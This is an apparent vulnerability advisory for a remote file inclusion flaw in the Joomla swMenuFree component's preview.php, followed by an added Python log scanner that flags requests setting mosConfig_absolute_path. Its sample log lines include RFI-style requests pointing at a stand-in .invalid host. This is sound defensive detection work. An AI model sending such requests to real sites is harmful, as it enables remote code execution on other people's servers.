PT-2007-6440 · Joomla · Swmenufree
Str0Kestr0Ke · Published 2007-10-12 · Updated 2024-08-07 · CVE-2007-5389
CVSS v2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Weakness: Code Injection
Affected Products: Swmenufree
Severity: Medium
Name of the Vulnerable Software and Affected Versions:
Joomla! component swMenuFree (com_swmenufree) version 4.6
Description:
A remote file inclusion issue in the preview.php file of the swMenuFree component allows remote attackers to execute arbitrary PHP code via a URL in the `mosConfig_absolute_path` parameter. However, a reliable third party disputes this issue because preview.php tests a certain constant to prevent direct requests.
Recommendations:
For version 4.6 of the swMenuFree component, consider restricting access to the `preview.php` file to minimize the risk of exploitation. Additionally, avoid using the `mosConfig_absolute_path` parameter in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
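To check whether the endpoint is being probed while access restrictions are put in place, the following added example (not part of the original advisory or the component's code) scans web server access logs for requests to the component's `preview.php` that supply `mosConfig_absolute_path`. The combined log format, the `/components/com_swmenufree/` path layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that points off-host: scheme://... or protocol-relative //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)
PARAM = "mosconfig_absolute_path"

def classify(line):
    """Return (kind, value) for a suspicious request line, else None."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    target = urlsplit(m.group(1))
    path = target.path.lower()
    if "com_swmenufree" not in path or not path.endswith("/preview.php"):
        return None
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is seen as http://...
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key.lower() == PARAM:
            # A site configuration variable should never arrive in a request,
            # so any occurrence is reported; a URL value is the RFI pattern.
            kind = "remote-url" if REMOTE_RE.match(value) else "param-set"
            return kind, value
    return None

def scan(lines):
    """Return [(line_number, kind, value)] for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result is not None:
            hits.append((number, *result))
    return hits

# Constructed sample log lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2007:10:01:02 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2007:10:01:09 +0000] "GET /components/com_swmenufree/preview.php?mosConfig_absolute_path=http://host.invalid/a.txt? HTTP/1.0" 200 312',
    '198.51.100.7 - - [12/Oct/2007:10:01:11 +0000] "GET /components/com_swmenufree/preview.php?mosConfig_absolute_path=ftp%3A%2F%2Fhost.invalid%2Fa HTTP/1.0" 403 199',
    '192.0.2.10 - - [12/Oct/2007:10:02:30 +0000] "GET /components/com_swmenufree/preview.php?id=3 HTTP/1.1" 200 900',
    '198.51.100.9 - - [12/Oct/2007:10:03:00 +0000] "GET /components/com_swmenufree/preview.php?MOSCONFIG_ABSOLUTE_PATH=/tmp HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `remote-url` hit answered with status 200 deserves a closer look at the response size and any follow-up requests from the same client; a 403 indicates the access restriction is already taking effect.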